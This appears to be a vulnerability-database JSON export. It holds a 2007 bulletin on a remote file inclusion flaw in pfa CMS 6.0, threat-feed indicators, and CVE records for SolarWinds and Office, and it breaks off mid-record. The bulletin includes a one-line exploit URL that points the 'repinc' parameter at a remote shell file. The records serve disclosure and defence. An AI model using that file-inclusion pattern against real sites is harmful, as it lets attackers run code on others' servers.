{"id": "SECURITYVULNS:DOC:16955", "bulletinFamily": "software", "title": "pfa CMS v6.0 (index.php repinc) Remote File Include Vulnerability", "description": "# pfa CMS v6.0 // AYYILDIZ.ORG Gururla Sunar ! => OZELHAREKAT\r\n\r\n# Author: iLker Kandemir <ilkerkandemir@mynet.com>\r\n\r\n# ScriptSite: http://pfa.netsliver.com/download_pfa\r\n\r\n# Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke\r\n\r\n# Exploit: http://[site]/[pfa_path]/index.php?repinc=http://shell.txt?\r\n", "published": "2007-05-08T00:00:00", "modified": "2007-05-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16955", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:22", "edition": 1, "viewCount": 102, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-08-31T11:10:22", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2526297", "KB317244", "KB980408", "KB981401", "KB2785908", "KB953331", "KB2404575", "KB2510690", "KB3191913", "KB2874216"]}], "modified": "2018-08-31T11:10:22", "rev": 2}, "vulnersScore": 0.7}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"rst": [{"id": "RST:D8B9136B-06A9-35A2-A362-2947457C4551", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 66.119.232.20", "description": "Found **66[.]119.232.20** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **34**.\n First seen: 2021-03-26T03:00:00, Last seen: 2021-04-23T03:00:00.\n IOC tags: **generic**.\nWe found that the IOC is used by: **necurs**.\nASN 16955: (First IP 66.119.224.0, Last IP 66.119.239.255).\nASN Name \"GETCOCAR\" and Organisation \"Getco LLC\".\nASN hosts 0 domains.\nGEO IP information: City \"\", Country \"United States\".\nIn according to RST Threat Feed the IP is related to **njdqlhpoeiiodjpwu.com** malicious domains.\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-04-24T00:00:00", "modified": "2021-03-26T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-04-23T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "7ac1bb5997c01812556eb0915eb2773c"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "8679e535630fa2a25bbcc5acb9fd6b48"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "de162cb9d3bd9d4be7c9569c86fb67e2"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "1c92d66085fa178967fa6155fe519696"}, {"key": "modified", "hash": "375c27958a2879337d16cb77e068c5d3"}, {"key": "published", "hash": "6f703f2fee99c97090f20c4e31098da9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "4caf6b4cca7ffde38558eee5f97513a8"}, {"key": "title", "hash": "6d0ffe16fa45e63e8e72959f7968c15a"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "15857ff00252dd56e4919f39132a505becd32779a1005828c23aa218a14a113e", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["66.119.232.20"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.64, "ioc_src": 68.04, "ioc_tags": 0.8, "ioc_total": 34.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 0, "firstip": {"netv4": "66.119.224.0", "num": "1115152384"}, "isp": "GETCOCAR", "lastip": {"netv4": "66.119.239.255", "num": "1115156479"}, "num": 16955, "org": "Getco LLC"}, "threat": ["necurs"], "immutableFields": []}, {"id": "RST:B2DC4B9F-DCCD-3050-99F9-7B5AD0939397", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: sf-2007.official-org.com/c/p/tc/16955/dae12d03-1b53-425f-b11d-e56bd93b00fc-ddc52d4e-c7de-4214-b1b9-10e6d2bb37a6", "description": "Found **sf-2007[.]official-org.com/c/p/tc/16955/dae12d03-1b53-425f-b11d-e56bd93b00fc-ddc52d4e-c7de-4214-b1b9-10e6d2bb37a6** in [RST Threat Feed](https://rstcloud.net/profeed) with score **18**.\n First seen: 2020-11-03T03:00:00, Last seen: 2020-11-04T03:00:00.\n IOC tags: **phishing**.\nIOC could be a **False Positive** (Resource unavailable).\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2020-11-05T00:00:00", "modified": "2020-11-03T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-11-04T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "1246cff305007137c5a428836730926a"}, {"key": "domain", "hash": "b4e2551c30c8729dac6fe5f9dac4acce"}, {"key": "fp", "hash": "fa606d49ea7798d3fe8c2c48edbac9a5"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "cc3596fedbcee8adbe1a340edfb519a9"}, {"key": "iocType", "hash": "572d4e421e5e6b9bc11d815e8a027112"}, {"key": "ip", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "bf7b190bd0628075759cca9329c8edc7"}, {"key": "published", "hash": "cf085eb93705dcfb13757e16624f1560"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "1ce4383d8816542878fa583f9d13e8a4"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "307a71e946ef438c606791fec70b92e5"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "8161aee0637c1ed3c36dc557551a1aef"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "5e22aaf38f668b620f8174c5b5d31349e1f8f209edc8fad8c80beaee4185c692", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "url", "ip": [], "domain": ["sf-2007.official-org.com"], "url": ["sf-2007.official-org.com/c/p/tc/16955/dae12d03-1b53-425f-b11d-e56bd93b00fc-ddc52d4e-c7de-4214-b1b9-10e6d2bb37a6"], "iocScore": {"ioc_frequency": 0.98, "ioc_src": 74.99, "ioc_tags": 0.83, "ioc_total": 18.0}, "tags": ["phishing"], "fp": {"alarm": "true", "descr": "Resource unavailable"}, "whois": {}, "geodata": {}, "asn": {}, "threat": []}], "cve": [{"id": "CVE-2019-16955", "bulletinFamily": "NVD", "title": "CVE-2019-16955", "description": "SolarWinds Web Help Desk 12.7.0 allows XSS via an uploaded SVG document in a request.", "published": "2020-12-18T09:15:00", "modified": "2020-12-18T14:15:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16955", "reporter": "cve@mitre.org", "references": ["https://support.solarwinds.com/SuccessCenter/s/", "https://www.esecforte.com/cross-site-scripting-via-file-upload-vulnerability-in-solarwinds-web-help-desk/", "https://www.solarwinds.com/free-tools/free-help-desk-software"], "cvelist": ["CVE-2019-16955"], "type": "cve", "lastseen": "2021-04-23T00:45:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "solarwinds:webhelpdesk", "name": "solarwinds webhelpdesk", "operator": "eq", "version": "12.7.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:solarwinds:webhelpdesk:12.7.0"], "cpe23": ["cpe:2.3:a:solarwinds:webhelpdesk:12.7.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:solarwinds:webhelpdesk:12.7.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2019-16955"], "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "SolarWinds Web Help Desk 12.7.0 allows XSS via an uploaded SVG document in a request.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-02-02T07:12:54", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T07:12:54", "rev": 2, "value": 2.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://support.solarwinds.com/SuccessCenter/s/", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://support.solarwinds.com/SuccessCenter/s/"}, {"name": "https://www.esecforte.com/cross-site-scripting-via-file-upload-vulnerability-in-solarwinds-web-help-desk/", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.esecforte.com/cross-site-scripting-via-file-upload-vulnerability-in-solarwinds-web-help-desk/"}, {"name": "https://www.solarwinds.com/free-tools/free-help-desk-software", "refsource": "MISC", "tags": ["Product"], "url": "https://www.solarwinds.com/free-tools/free-help-desk-software"}], "hash": "7ab86f2a023ff426d3432179307f37f1fa1eca17a234e11c647e6be311aecf42", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "ce8ce7b2cb0a8fad4697fda8a117f8ef", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "9c4ab7477c2fda475b79be18b75d2096", "key": "cpe"}, {"hash": "ffb56ab28fc13e6b73acbca81da8fc7c", "key": "modified"}, {"hash": "0667f2d826acb9698a3c920e45734fb7", "key": "cpeConfiguration"}, {"hash": "43c55a2ef083f78c6dc7438319af07b8", "key": "cvss"}, {"hash": "23208d530a55372cfa4cd456c7d3d152", "key": "cvss2"}, {"hash": "05e0e963d4eb3a16a7118b339423898b", "key": "references"}, {"hash": "f31ef1786a3544d7cc14bff72b68ca89", "key": "extraReferences"}, {"hash": "cd627fe27d9c4ca1c7a5f190cc14f6a8", "key": "href"}, {"hash": "8530c9793dbbac4c62c9768f72c09386", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f70c7875158448a5522b15acae8fcd60", "key": "cpe23"}, {"hash": "c594808f27760b9cecc1b357f4e641f7", "key": "published"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "2efcb37eff0caa56388c9b32249aea1c", "key": "description"}, {"hash": "dfe36fbe4c11f58df6e7e3bc9ca1ae50", "key": "cvelist"}, {"hash": "fa39eb1615c53f55d1295e09310e8188", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16955", "id": "CVE-2019-16955", "immutableFields": [], "lastseen": "2021-02-02T07:12:54", "modified": "2020-12-18T14:15:00", "objectVersion": "1.5", "published": "2020-12-18T09:15:00", "references": ["https://support.solarwinds.com/SuccessCenter/s/", "https://www.esecforte.com/cross-site-scripting-via-file-upload-vulnerability-in-solarwinds-web-help-desk/", "https://www.solarwinds.com/free-tools/free-help-desk-software"], "reporter": "cve@mitre.org", "title": "CVE-2019-16955", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 2, "lastseen": "2021-02-02T07:12:54"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "solarwinds:webhelpdesk", "name": "solarwinds webhelpdesk", "operator": "eq", "version": "12.7.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:solarwinds:webhelpdesk:12.7.0"], "cpe23": ["cpe:2.3:a:solarwinds:webhelpdesk:12.7.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:solarwinds:webhelpdesk:12.7.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2019-16955"], "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "SolarWinds Web Help Desk 12.7.0 allows XSS via an uploaded SVG document in a request.", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-12-19T13:40:35", "references": [], "rev": 2}, "score": {"modified": "2020-12-19T13:40:35", "rev": 2, "value": 2.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3560046e13dec60d5297af589570ef1dcf1b60256fa8757f0a7b1a991588d786", "hashmap": [{"hash": "ce8ce7b2cb0a8fad4697fda8a117f8ef", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "9c4ab7477c2fda475b79be18b75d2096", "key": "cpe"}, {"hash": "ffb56ab28fc13e6b73acbca81da8fc7c", "key": "modified"}, {"hash": "0667f2d826acb9698a3c920e45734fb7", "key": "cpeConfiguration"}, {"hash": "43c55a2ef083f78c6dc7438319af07b8", "key": "cvss"}, {"hash": "23208d530a55372cfa4cd456c7d3d152", "key": "cvss2"}, {"hash": "05e0e963d4eb3a16a7118b339423898b", "key": "references"}, {"hash": "cd627fe27d9c4ca1c7a5f190cc14f6a8", "key": "href"}, {"hash": "8530c9793dbbac4c62c9768f72c09386", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f70c7875158448a5522b15acae8fcd60", "key": "cpe23"}, {"hash": "c594808f27760b9cecc1b357f4e641f7", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "2efcb37eff0caa56388c9b32249aea1c", "key": "description"}, {"hash": "dfe36fbe4c11f58df6e7e3bc9ca1ae50", "key": "cvelist"}, {"hash": "fa39eb1615c53f55d1295e09310e8188", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16955", "id": "CVE-2019-16955", "lastseen": "2020-12-19T13:40:35", "modified": "2020-12-18T14:15:00", "objectVersion": "1.3", "published": "2020-12-18T09:15:00", "references": ["https://support.solarwinds.com/SuccessCenter/s/", "https://www.esecforte.com/cross-site-scripting-via-file-upload-vulnerability-in-solarwinds-web-help-desk/", "https://www.solarwinds.com/free-tools/free-help-desk-software"], "reporter": "cve@mitre.org", "title": "CVE-2019-16955", "type": "cve", "viewCount": 9}, "differentElements": ["extraReferences"], "edition": 1, "lastseen": "2020-12-19T13:40:35"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "fa39eb1615c53f55d1295e09310e8188"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "9c4ab7477c2fda475b79be18b75d2096"}, {"key": "cpe23", "hash": "f70c7875158448a5522b15acae8fcd60"}, {"key": "cpeConfiguration", "hash": "b5d6913617420d8c62b97670dea9cec6"}, {"key": "cvelist", "hash": "dfe36fbe4c11f58df6e7e3bc9ca1ae50"}, {"key": "cvss", "hash": "43c55a2ef083f78c6dc7438319af07b8"}, {"key": "cvss2", "hash": "23208d530a55372cfa4cd456c7d3d152"}, {"key": "cvss3", "hash": "8530c9793dbbac4c62c9768f72c09386"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "2efcb37eff0caa56388c9b32249aea1c"}, {"key": "extraReferences", "hash": "f31ef1786a3544d7cc14bff72b68ca89"}, {"key": "href", "hash": "cd627fe27d9c4ca1c7a5f190cc14f6a8"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "ffb56ab28fc13e6b73acbca81da8fc7c"}, {"key": "published", "hash": "c594808f27760b9cecc1b357f4e641f7"}, {"key": "references", "hash": "05e0e963d4eb3a16a7118b339423898b"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "ce8ce7b2cb0a8fad4697fda8a117f8ef"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "ba16f0926b53eaa78279e9cc82be80e6c74416ae6eb51798178b97d612d33a43", "viewCount": 13, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T00:45:18", "rev": 2}, "score": {"value": 2.2, "vector": "NONE", "modified": "2021-04-23T00:45:18", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:solarwinds:webhelpdesk:12.7.0"], "affectedSoftware": [{"cpeName": "solarwinds:webhelpdesk", "name": "solarwinds webhelpdesk", "operator": "eq", "version": "12.7.0"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:solarwinds:webhelpdesk:12.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "cpe23": ["cpe:2.3:a:solarwinds:webhelpdesk:12.7.0:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "extraReferences": [{"name": "https://support.solarwinds.com/SuccessCenter/s/", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://support.solarwinds.com/SuccessCenter/s/"}, {"name": "https://www.esecforte.com/cross-site-scripting-via-file-upload-vulnerability-in-solarwinds-web-help-desk/", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.esecforte.com/cross-site-scripting-via-file-upload-vulnerability-in-solarwinds-web-help-desk/"}, {"name": "https://www.solarwinds.com/free-tools/free-help-desk-software", "refsource": "MISC", "tags": ["Product"], "url": "https://www.solarwinds.com/free-tools/free-help-desk-software"}], "scheme": null, "immutableFields": []}, {"id": "CVE-2020-16934", "bulletinFamily": "NVD", "title": "CVE-2020-16934", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955.", "published": "2020-10-16T23:15:00", "modified": "2021-07-21T11:39:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16934", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"], "cvelist": ["CVE-2020-16934"], "type": "cve", "lastseen": "2021-08-04T16:55:08", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office_2013_click-to-run", "name": "microsoft office 2013 click-to-run", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:office_2013_click-to-run:-", "cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16934"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-269"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955.", "edition": 5, "enchantments": {"dependencies": {"modified": "2021-07-22T08:54:28", "references": [{"idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"], "type": "metasploit"}, {"idList": ["MS:CVE-2020-16934"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2021-07-22T08:54:28", "rev": 2, "value": 3.6, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"}], "hash": "83a4a8f6ae018b98c6202f007407ea1ce4e0ea867b9c88cc9a0eff9f5f8bdf74", "hashmap": [{"hash": "a12b81fd55c2f86c58072a8b56df1494", "key": "cwe"}, {"hash": "9f07fc79fd96425ffe7af9f348a376d3", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "d97cd98427033ef99d7ece96cd433440", "key": "cpe"}, {"hash": "846a8db81f4c64695be131b7890928a8", "key": "cpeConfiguration"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "68c7e2fafc3e11d5a55b53907c05df7c", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "4aad597ac1204ece85ab0aa87e8e57f5", "key": "title"}, {"hash": "029dfc07c499dc142a429cac0a029e99", "key": "reporter"}, {"hash": "d1fd53bc3ff75ff44289931ee5637b03", "key": "extraReferences"}, {"hash": "83df37a1cf6c77dcffef92e4bca4fa70", "key": "description"}, {"hash": "33505c5e409237f20ec80bdac8f93985", "key": "cpe23"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6f84ced2d5775a1d2a7bf11629ea533d", "key": "references"}, {"hash": "d314ac9e84ae7d46ffaec0919bb91aed", "key": "href"}, {"hash": "183798fce373747341ba2f32f8021ac7", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16934", "id": "CVE-2020-16934", "immutableFields": [], "lastseen": "2021-07-22T08:54:28", "modified": "2021-07-21T11:39:00", "objectVersion": "1.5", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16934"], "reporter": "secure@microsoft.com", "title": "CVE-2020-16934", "type": "cve", "viewCount": 16}, "different_elements": ["cwe"], "edition": 5, "lastseen": "2021-07-22T08:54:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office_2013_click-to-run", "name": "microsoft office 2013 click-to-run", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:office_2013_click-to-run:-", "cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office_2013_click-to-run:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": 